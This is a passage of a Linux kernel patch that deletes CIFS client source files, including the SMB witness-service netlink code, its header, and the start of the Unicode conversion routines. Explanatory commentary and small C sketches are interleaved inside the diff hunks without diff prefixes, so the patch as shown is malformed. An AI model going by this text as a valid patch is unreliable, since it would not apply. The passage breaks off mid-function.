+-		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_USER_NAME, tcon->ses->user_name);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	if (tcon->ses->password != NULL) {
+-		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_PASSWORD, tcon->ses->password);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	if (tcon->ses->domainName != NULL) {
+-		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_DOMAIN_NAME, tcon->ses->domainName);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+-/*
+- * Sends a register message to the userspace daemon based on the registration.
+- * The authentication information to connect to the witness service is bundled
+- * into the message.
+- */
+-static int cifs_swn_send_register_message(struct cifs_swn_reg *swnreg)
+-{
+-	struct sk_buff *skb;
+-	struct genlmsghdr *hdr;
+-	enum securityEnum authtype;
+-	struct sockaddr_storage *addr;
+-	int ret;
+-
+-	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (skb == NULL) {
+-		ret = -ENOMEM;
+-		goto fail;
+-	}
+-
+-	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_REGISTER);
+-	if (hdr == NULL) {
+-		ret = -ENOMEM;
+-		goto nlmsg_fail;
+-	}
+-
+-	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	/*
+-	 * If there is an address stored use it instead of the server address, because we are
+-	 * in the process of reconnecting to it after a share has been moved or we have been
+-	 * told to switch to it (client move message). In these cases we unregister from the
+-	 * server address and register to the new address when we receive the notification.
+-	 */
+-	if (swnreg->tcon->ses->server->use_swn_dstaddr)
+-		addr = &swnreg->tcon->ses->server->swn_dstaddr;
+-	else
+-		addr = &swnreg->tcon->ses->server->dstaddr;
+-
+-	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage), addr);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	if (swnreg->net_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->share_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->ip_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	authtype = cifs_select_sectype(swnreg->tcon->ses->server, swnreg->tcon->ses->sectype);
+-	switch (authtype) {
+-	case Kerberos:
+-		ret = cifs_swn_auth_info_krb(swnreg->tcon, skb);
+-		if (ret < 0) {
+-			cifs_dbg(VFS, "%s: Failed to get kerberos auth info: %d\n", __func__, ret);
+-			goto nlmsg_fail;
+-		}
+-		break;
+-	case NTLMv2:
+-	case RawNTLMSSP:
+-		ret = cifs_swn_auth_info_ntlm(swnreg->tcon, skb);
+-		if (ret < 0) {
+-			cifs_dbg(VFS, "%s: Failed to get NTLM auth info: %d\n", __func__, ret);
+-			goto nlmsg_fail;
+-		}
+-		break;
+-	default:
+-		cifs_dbg(VFS, "%s: secType %d not supported!\n", __func__, authtype);
+-		ret = -EINVAL;
+-		goto nlmsg_fail;
+-	}
+-
+-	genlmsg_end(skb, hdr);
+-	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
+-
+-	cifs_dbg(FYI, "%s: Message to register for network name %s with id %d sent\n", __func__,
+-			swnreg->net_name, swnreg->id);
+-
+-	return 0;
+-
+-nlmsg_fail:
+-	genlmsg_cancel(skb, hdr);
+-	nlmsg_free(skb);
+-fail:
+-	return ret;
+-}
+-
+-/*
+- * Sends an unregister message to the userspace daemon based on the registration
+- */
+-static int cifs_swn_send_unregister_message(struct cifs_swn_reg *swnreg)
+-{
+-	struct sk_buff *skb;
+-	struct genlmsghdr *hdr;
+-	int ret;
+-
+-	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (skb == NULL)
+-		return -ENOMEM;
+-
+-	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_UNREGISTER);
+-	if (hdr == NULL) {
+-		ret = -ENOMEM;
+-		goto nlmsg_fail;
+-	}
+-
+-	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage),
+-			&swnreg->tcon->ses->server->dstaddr);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	if (swnreg->net_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->share_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->ip_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	genlmsg_end(skb, hdr);
+-	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
+-
+-	cifs_dbg(FYI, "%s: Message to unregister for network name %s with id %d sent\n", __func__,
+-			swnreg->net_name, swnreg->id);
+-
+-	return 0;
+-
+-nlmsg_fail:
+-	genlmsg_cancel(skb, hdr);
+-	nlmsg_free(skb);
+-	return ret;
+-}
+-
+-/*
+- * Try to find a matching registration for the tcon's server name and share name.
+- * Calls to this function must be protected by cifs_swnreg_idr_mutex.
+- * TODO Try to avoid memory allocations
+- */
+-static struct cifs_swn_reg *cifs_find_swn_reg(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	int id;
+-	const char *share_name;
+-	const char *net_name;
+-
+-	net_name = extract_hostname(tcon->tree_name);
+-	if (IS_ERR(net_name)) {
+-		int ret;
+-
+-		ret = PTR_ERR(net_name);
+-		cifs_dbg(VFS, "%s: failed to extract host name from target '%s': %d\n",
+-				__func__, tcon->tree_name, ret);
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	share_name = extract_sharename(tcon->tree_name);
+-	if (IS_ERR(share_name)) {
+-		int ret;
+-
+-		ret = PTR_ERR(share_name);
+-		cifs_dbg(VFS, "%s: failed to extract share name from target '%s': %d\n",
+-				__func__, tcon->tree_name, ret);
+-		kfree(net_name);
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
+-		if (strcasecmp(swnreg->net_name, net_name) != 0
+-		    || strcasecmp(swnreg->share_name, share_name) != 0) {
+-			continue;
+-		}
+-
+-		cifs_dbg(FYI, "Existing swn registration for %s:%s found\n", swnreg->net_name,
+-				swnreg->share_name);
+-
+-		kfree(net_name);
+-		kfree(share_name);
+-
+-		return swnreg;
+-	}
+-
+-	kfree(net_name);
+-	kfree(share_name);
+-
+-	return ERR_PTR(-EEXIST);
+-}
+-
+-/*
+- * Get a registration for the tcon's server and share name, allocating a new
+- * one if it does not exist
+- */
+-static struct cifs_swn_reg *cifs_get_swn_reg(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *reg = NULL;
+-	int ret;
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-
+-	/* Check if we are already registered for this network and share names */
+-	reg = cifs_find_swn_reg(tcon);
+-	if (!IS_ERR(reg)) {
+-		kref_get(&reg->ref_count);
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return reg;
+-	} else if (PTR_ERR(reg) != -EEXIST) {
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return reg;
+-	}
+-
+-	reg = kmalloc(sizeof(struct cifs_swn_reg), GFP_ATOMIC);
+-	if (reg == NULL) {
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	kref_init(&reg->ref_count);
+-
+-	reg->id = idr_alloc(&cifs_swnreg_idr, reg, 1, 0, GFP_ATOMIC);
+-	if (reg->id < 0) {
+-		cifs_dbg(FYI, "%s: failed to allocate registration id\n", __func__);
+-		ret = reg->id;
+-		goto fail;
+-	}
+-
+-	reg->net_name = extract_hostname(tcon->tree_name);
+-	if (IS_ERR(reg->net_name)) {
+-		ret = PTR_ERR(reg->net_name);
+-		cifs_dbg(VFS, "%s: failed to extract host name from target: %d\n", __func__, ret);
+-		goto fail_idr;
+-	}
+-
+-	reg->share_name = extract_sharename(tcon->tree_name);
+-	if (IS_ERR(reg->share_name)) {
+-		ret = PTR_ERR(reg->share_name);
+-		cifs_dbg(VFS, "%s: failed to extract share name from target: %d\n", __func__, ret);
+-		goto fail_net_name;
+-	}
+-
+-	reg->net_name_notify = true;
+-	reg->share_name_notify = true;
+-	reg->ip_notify = (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT);
+-
+-	reg->tcon = tcon;
+-
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-
+-	return reg;
+-
+-fail_net_name:
+-	kfree(reg->net_name);
+-fail_idr:
+-	idr_remove(&cifs_swnreg_idr, reg->id);
+-fail:
+-	kfree(reg);
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-	return ERR_PTR(ret);
+-}
+-
+-static void cifs_swn_reg_release(struct kref *ref)
+-{
+-	struct cifs_swn_reg *swnreg = container_of(ref, struct cifs_swn_reg, ref_count);
+-	int ret;
+-
+-	ret = cifs_swn_send_unregister_message(swnreg);
+-	if (ret < 0)
+-		cifs_dbg(VFS, "%s: Failed to send unregister message: %d\n", __func__, ret);
+-
+-	idr_remove(&cifs_swnreg_idr, swnreg->id);
+-	kfree(swnreg->net_name);
+-	kfree(swnreg->share_name);
+-	kfree(swnreg);
+-}
+-
+-static void cifs_put_swn_reg(struct cifs_swn_reg *swnreg)
+-{
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-	kref_put(&swnreg->ref_count, cifs_swn_reg_release);
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-}
+-
+-static int cifs_swn_resource_state_changed(struct cifs_swn_reg *swnreg, const char *name, int state)
+-{
+-	switch (state) {
+-	case CIFS_SWN_RESOURCE_STATE_UNAVAILABLE:
+-		cifs_dbg(FYI, "%s: resource name '%s' became unavailable\n", __func__, name);
+-		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
+-		break;
+-	case CIFS_SWN_RESOURCE_STATE_AVAILABLE:
+-		cifs_dbg(FYI, "%s: resource name '%s' became available\n", __func__, name);
+-		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
+-		break;
+-	case CIFS_SWN_RESOURCE_STATE_UNKNOWN:
+-		cifs_dbg(FYI, "%s: resource name '%s' changed to unknown state\n", __func__, name);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static bool cifs_sockaddr_equal(struct sockaddr_storage *addr1, struct sockaddr_storage *addr2)
+-{
+-	if (addr1->ss_family != addr2->ss_family)
+-		return false;
+-
+-	if (addr1->ss_family == AF_INET) {
+-		return (memcmp(&((const struct sockaddr_in *)addr1)->sin_addr,
+-				&((const struct sockaddr_in *)addr2)->sin_addr,
+-				sizeof(struct in_addr)) == 0);
+-	}
+-
+-	if (addr1->ss_family == AF_INET6) {
+-		return (memcmp(&((const struct sockaddr_in6 *)addr1)->sin6_addr,
+-				&((const struct sockaddr_in6 *)addr2)->sin6_addr,
+-				sizeof(struct in6_addr)) == 0);
+-	}
+-
+-	return false;
+-}
+-
+-static int cifs_swn_store_swn_addr(const struct sockaddr_storage *new,
+-				   const struct sockaddr_storage *old,
+-				   struct sockaddr_storage *dst)
+-{
+-	__be16 port = cpu_to_be16(CIFS_PORT);
+-
+-	if (old->ss_family == AF_INET) {
+-		struct sockaddr_in *ipv4 = (struct sockaddr_in *)old;
+-
+-		port = ipv4->sin_port;
+-	} else if (old->ss_family == AF_INET6) {
+-		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)old;
+-
+-		port = ipv6->sin6_port;
+-	}
+-
+-	if (new->ss_family == AF_INET) {
+-		struct sockaddr_in *ipv4 = (struct sockaddr_in *)new;
+-
+-		ipv4->sin_port = port;
+-	} else if (new->ss_family == AF_INET6) {
+-		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)new;
+-
+-		ipv6->sin6_port = port;
+-	}
+-
+-	*dst = *new;
+-
+-	return 0;
+-}
+-
+-static int cifs_swn_reconnect(struct cifs_tcon *tcon, struct sockaddr_storage *addr)
+-{
+-	int ret = 0;
+-
+-	/* Store the reconnect address */
+-	cifs_server_lock(tcon->ses->server);
+-	if (cifs_sockaddr_equal(&tcon->ses->server->dstaddr, addr))
+-		goto unlock;
+-
+-	ret = cifs_swn_store_swn_addr(addr, &tcon->ses->server->dstaddr,
+-				      &tcon->ses->server->swn_dstaddr);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: failed to store address: %d\n", __func__, ret);
+-		goto unlock;
+-	}
+-	tcon->ses->server->use_swn_dstaddr = true;
+-
+-	/*
+-	 * Unregister to stop receiving notifications for the old IP address.
+-	 */
+-	ret = cifs_swn_unregister(tcon);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
+-			 __func__, ret);
+-		goto unlock;
+-	}
+-
+-	/*
+-	 * And register to receive notifications for the new IP address now that we have
+-	 * stored the new address.
+-	 */
+-	ret = cifs_swn_register(tcon);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: Failed to register for witness notifications: %d\n",
+-			 __func__, ret);
+-		goto unlock;
+-	}
+-
+-	cifs_signal_cifsd_for_reconnect(tcon->ses->server, false);
+-
+-unlock:
+-	cifs_server_unlock(tcon->ses->server);
+-
+-	return ret;
+-}
+-
+-static int cifs_swn_client_move(struct cifs_swn_reg *swnreg, struct sockaddr_storage *addr)
+-{
+-	struct sockaddr_in *ipv4 = (struct sockaddr_in *)addr;
+-	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)addr;
+-
+-	if (addr->ss_family == AF_INET)
+-		cifs_dbg(FYI, "%s: move to %pI4\n", __func__, &ipv4->sin_addr);
+-	else if (addr->ss_family == AF_INET6)
+-		cifs_dbg(FYI, "%s: move to %pI6\n", __func__, &ipv6->sin6_addr);
+-
+-	return cifs_swn_reconnect(swnreg->tcon, addr);
+-}
+-
+-int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	char name[256];
+-	int type;
+-
+-	if (info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]) {
+-		int swnreg_id;
+-
+-		swnreg_id = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]);
+-		mutex_lock(&cifs_swnreg_idr_mutex);
+-		swnreg = idr_find(&cifs_swnreg_idr, swnreg_id);
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		if (swnreg == NULL) {
+-			cifs_dbg(FYI, "%s: registration id %d not found\n", __func__, swnreg_id);
+-			return -EINVAL;
+-		}
+-	} else {
+-		cifs_dbg(FYI, "%s: missing registration id attribute\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	if (info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]) {
+-		type = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]);
+-	} else {
+-		cifs_dbg(FYI, "%s: missing notification type attribute\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	switch (type) {
+-	case CIFS_SWN_NOTIFICATION_RESOURCE_CHANGE: {
+-		int state;
+-
+-		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]) {
+-			nla_strscpy(name, info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME],
+-					sizeof(name));
+-		} else {
+-			cifs_dbg(FYI, "%s: missing resource name attribute\n", __func__);
+-			return -EINVAL;
+-		}
+-		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]) {
+-			state = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]);
+-		} else {
+-			cifs_dbg(FYI, "%s: missing resource state attribute\n", __func__);
+-			return -EINVAL;
+-		}
+-		return cifs_swn_resource_state_changed(swnreg, name, state);
+-	}
+-	case CIFS_SWN_NOTIFICATION_CLIENT_MOVE: {
+-		struct sockaddr_storage addr;
+-
+-		if (info->attrs[CIFS_GENL_ATTR_SWN_IP]) {
+-			nla_memcpy(&addr, info->attrs[CIFS_GENL_ATTR_SWN_IP], sizeof(addr));
+-		} else {
+-			cifs_dbg(FYI, "%s: missing IP address attribute\n", __func__);
+-			return -EINVAL;
+-		}
+-		return cifs_swn_client_move(swnreg, &addr);
+-	}
+-	default:
+-		cifs_dbg(FYI, "%s: unknown notification type %d\n", __func__, type);
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+-int cifs_swn_register(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	int ret;
+-
+-	swnreg = cifs_get_swn_reg(tcon);
+-	if (IS_ERR(swnreg))
+-		return PTR_ERR(swnreg);
+-
+-	ret = cifs_swn_send_register_message(swnreg);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: Failed to send swn register message: %d\n", __func__, ret);
+-		/* Do not put the swnreg or return an error; the echo task will retry */
+-	}
+-
+-	return 0;
+-}
+-
+-int cifs_swn_unregister(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *swnreg;
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-
+-	swnreg = cifs_find_swn_reg(tcon);
+-	if (IS_ERR(swnreg)) {
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return PTR_ERR(swnreg);
+-	}
+-
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-
+-	cifs_put_swn_reg(swnreg);
+-
+-	return 0;
+-}
+-
+-void cifs_swn_dump(struct seq_file *m)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	struct sockaddr_in *sa;
+-	struct sockaddr_in6 *sa6;
+-	int id;
+-
+-	seq_puts(m, "Witness registrations:");
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
+-		seq_printf(m, "\nId: %u Refs: %u Network name: '%s'%s Share name: '%s'%s Ip address: ",
+-				id, kref_read(&swnreg->ref_count),
+-				swnreg->net_name, swnreg->net_name_notify ? "(y)" : "(n)",
+-				swnreg->share_name, swnreg->share_name_notify ? "(y)" : "(n)");
+-		switch (swnreg->tcon->ses->server->dstaddr.ss_family) {
+-		case AF_INET:
+-			sa = (struct sockaddr_in *) &swnreg->tcon->ses->server->dstaddr;
+-			seq_printf(m, "%pI4", &sa->sin_addr.s_addr);
+-			break;
+-		case AF_INET6:
+-			sa6 = (struct sockaddr_in6 *) &swnreg->tcon->ses->server->dstaddr;
+-			seq_printf(m, "%pI6", &sa6->sin6_addr.s6_addr);
+-			if (sa6->sin6_scope_id)
+-				seq_printf(m, "%%%u", sa6->sin6_scope_id);
+-			break;
+-		default:
+-			seq_puts(m, "(unknown)");
+-		}
+-		seq_printf(m, "%s", swnreg->ip_notify ? "(y)" : "(n)");
+-	}
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-	seq_puts(m, "\n");
+-}
+-
+-void cifs_swn_check(void)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	int id;
+-	int ret;
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
+-		ret = cifs_swn_send_register_message(swnreg);
+-		if (ret < 0)
+-			cifs_dbg(FYI, "%s: Failed to send register message: %d\n", __func__, ret);
+-	}
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-}
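One observation on the two message builders above: they repeat the same put-attribute-then-bail sequence for every attribute. A hedged sketch of folding the string case into a helper (the helper name is invented, not from this file):

/*
 * Sketch only: the repeated nla_put_string()-and-check idiom from the
 * register/unregister builders. Callers still genlmsg_cancel() and
 * nlmsg_free() when this returns a negative value.
 */
#include <net/genetlink.h>

static int swn_put_str(struct sk_buff *skb, int attrtype, const char *str)
{
	return str ? nla_put_string(skb, attrtype, str) : 0;
}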
+diff --git a/fs/cifs/cifs_swn.h b/fs/cifs/cifs_swn.h
+deleted file mode 100644
+index 8a9d2a5c9077e..0000000000000
+--- a/fs/cifs/cifs_swn.h
++++ /dev/null
+@@ -1,52 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Witness Service client for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#ifndef _CIFS_SWN_H
+-#define _CIFS_SWN_H
+-#include "cifsglob.h"
+-
+-struct cifs_tcon;
+-struct sk_buff;
+-struct genl_info;
+-
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-extern int cifs_swn_register(struct cifs_tcon *tcon);
+-
+-extern int cifs_swn_unregister(struct cifs_tcon *tcon);
+-
+-extern int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info);
+-
+-extern void cifs_swn_dump(struct seq_file *m);
+-
+-extern void cifs_swn_check(void);
+-
+-static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server)
+-{
+-	if (server->use_swn_dstaddr) {
+-		server->dstaddr = server->swn_dstaddr;
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server)
+-{
+-	server->use_swn_dstaddr = false;
+-}
+-
+-#else
+-
+-static inline int cifs_swn_register(struct cifs_tcon *tcon) { return 0; }
+-static inline int cifs_swn_unregister(struct cifs_tcon *tcon) { return 0; }
+-static inline int cifs_swn_notify(struct sk_buff *s, struct genl_info *i) { return 0; }
+-static inline void cifs_swn_dump(struct seq_file *m) {}
+-static inline void cifs_swn_check(void) {}
+-static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server) { return false; }
+-static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server) {}
+-
+-#endif /* CONFIG_CIFS_SWN_UPCALL */
+-#endif /* _CIFS_SWN_H */
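The #else branch above is the kernel's standard config-stub idiom: with CONFIG_CIFS_SWN_UPCALL disabled, every entry point compiles to a static inline no-op, so call sites need no #ifdef of their own. The same pattern in generic form (feature and type names hypothetical):

/* Generic form of the idiom; CONFIG_FOO and struct foo_dev are hypothetical */
#ifdef CONFIG_FOO
int foo_register(struct foo_dev *dev);	/* real implementation elsewhere */
#else
static inline int foo_register(struct foo_dev *dev) { return 0; }
#endif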
+diff --git a/fs/cifs/cifs_unicode.c b/fs/cifs/cifs_unicode.c
+deleted file mode 100644
+index e7582dd791794..0000000000000
+--- a/fs/cifs/cifs_unicode.c
++++ /dev/null
+@@ -1,632 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- */
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "cifs_uniupr.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-
+-int cifs_remap(struct cifs_sb_info *cifs_sb)
+-{
+-	int map_type;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
+-		map_type = SFM_MAP_UNI_RSVD;
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
+-		map_type = SFU_MAP_UNI_RSVD;
+-	else
+-		map_type = NO_MAP_UNI_RSVD;
+-
+-	return map_type;
+-}
+-
+-/* Convert character using the SFU - "Services for Unix" remapping range */
+-static bool
+-convert_sfu_char(const __u16 src_char, char *target)
+-{
+-	/*
+-	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
+-	 *     build_path_from_dentry are modified, as they use slash as
+-	 *     separator.
+-	 */
+-	switch (src_char) {
+-	case UNI_COLON:
+-		*target = ':';
+-		break;
+-	case UNI_ASTERISK:
+-		*target = '*';
+-		break;
+-	case UNI_QUESTION:
+-		*target = '?';
+-		break;
+-	case UNI_PIPE:
+-		*target = '|';
+-		break;
+-	case UNI_GRTRTHAN:
+-		*target = '>';
+-		break;
+-	case UNI_LESSTHAN:
+-		*target = '<';
+-		break;
+-	default:
+-		return false;
+-	}
+-	return true;
+-}
+-
+-/* Convert character using the SFM - "Services for Mac" remapping range */
+-static bool
+-convert_sfm_char(const __u16 src_char, char *target)
+-{
+-	if (src_char >= 0xF001 && src_char <= 0xF01F) {
+-		*target = src_char - 0xF000;
+-		return true;
+-	}
+-	switch (src_char) {
+-	case SFM_COLON:
+-		*target = ':';
+-		break;
+-	case SFM_DOUBLEQUOTE:
+-		*target = '"';
+-		break;
+-	case SFM_ASTERISK:
+-		*target = '*';
+-		break;
+-	case SFM_QUESTION:
+-		*target = '?';
+-		break;
+-	case SFM_PIPE:
+-		*target = '|';
+-		break;
+-	case SFM_GRTRTHAN:
+-		*target = '>';
+-		break;
+-	case SFM_LESSTHAN:
+-		*target = '<';
+-		break;
+-	case SFM_SPACE:
+-		*target = ' ';
+-		break;
+-	case SFM_PERIOD:
+-		*target = '.';
+-		break;
+-	default:
+-		return false;
+-	}
+-	return true;
+-}
+-
+-
+-/*
+- * cifs_mapchar - convert a host-endian char to proper char in codepage
+- * @target - where converted character should be copied
+- * @from - pointer to 2-byte host-endian source character(s)
+- * @cp - codepage to which character should be converted
+- * @maptype - how should the 7 NTFS/SMB reserved characters be mapped to UCS2?
+- *
+- * This function handles the conversion of a single character. It is the
+- * responsibility of the caller to ensure that the target buffer is large
+- * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
+- */
+-static int
+-cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp,
+-	     int maptype)
+-{
+-	int len = 1;
+-	__u16 src_char;
+-
+-	src_char = *from;
+-
+-	if ((maptype == SFM_MAP_UNI_RSVD) && convert_sfm_char(src_char, target))
+-		return len;
+-	else if ((maptype == SFU_MAP_UNI_RSVD) &&
+-		  convert_sfu_char(src_char, target))
+-		return len;
+-
+-	/* if character not one of seven in special remap set */
+-	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
+-	if (len <= 0)
+-		goto surrogate_pair;
+-
+-	return len;
+-
+-surrogate_pair:
+-	/* convert SURROGATE_PAIR and IVS */
+-	if (strcmp(cp->charset, "utf8"))
+-		goto unknown;
+-	len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6);
+-	if (len <= 0)
+-		goto unknown;
+-	return len;
+-
+-unknown:
+-	*target = '?';
+-	len = 1;
+-	return len;
+-}
+-
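The surrogate_pair path above matters because one UTF-16 surrogate pair encodes a single code point that becomes four UTF-8 bytes, which is why the caller advances an extra input word when charlen == 4. A stand-alone illustration of the pairing arithmetic (the code point is chosen purely for demonstration):

/*
 * Stand-alone illustration: the UTF-16LE pair 0xD83D 0xDE00 decodes
 * to U+1F600, a single code point that needs 4 bytes in UTF-8.
 */
#include <stdio.h>

int main(void)
{
	unsigned short hi = 0xD83D, lo = 0xDE00;
	unsigned int cp = 0x10000 + (((hi - 0xD800) << 10) | (lo - 0xDC00));

	printf("U+%04X -> one 4-byte UTF-8 sequence\n", cp);
	return 0;
}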
+-/*
+- * cifs_from_utf16 - convert utf16le string to local charset
+- * @to - destination buffer
+- * @from - source buffer
+- * @tolen - destination buffer size (in bytes)
+- * @fromlen - source buffer size (in bytes)
+- * @codepage - codepage to which characters should be converted
+- * @map_type - should characters be remapped according to the mapchars option?
+- *
+- * Convert a little-endian utf16le string (as sent by the server) to a string
+- * in the provided codepage. The tolen and fromlen parameters are to ensure
+- * that the code doesn't walk off of the end of the buffer (which is always
+- * a danger if the alignment of the source buffer is off). The destination
+- * string is always properly null terminated and fits in the destination
+- * buffer. Returns the length of the destination string in bytes (including
+- * null terminator).
+- *
+- * Note that some Windows versions actually send multiword UTF-16 characters
+- * instead of straight UTF16-2. The Linux NLS routines, however, aren't able to
+- * deal with those characters properly. In the event that we get some of
+- * those characters, they won't be translated properly.
+- */
+-int
+-cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+-		const struct nls_table *codepage, int map_type)
+-{
+-	int i, charlen, safelen;
+-	int outlen = 0;
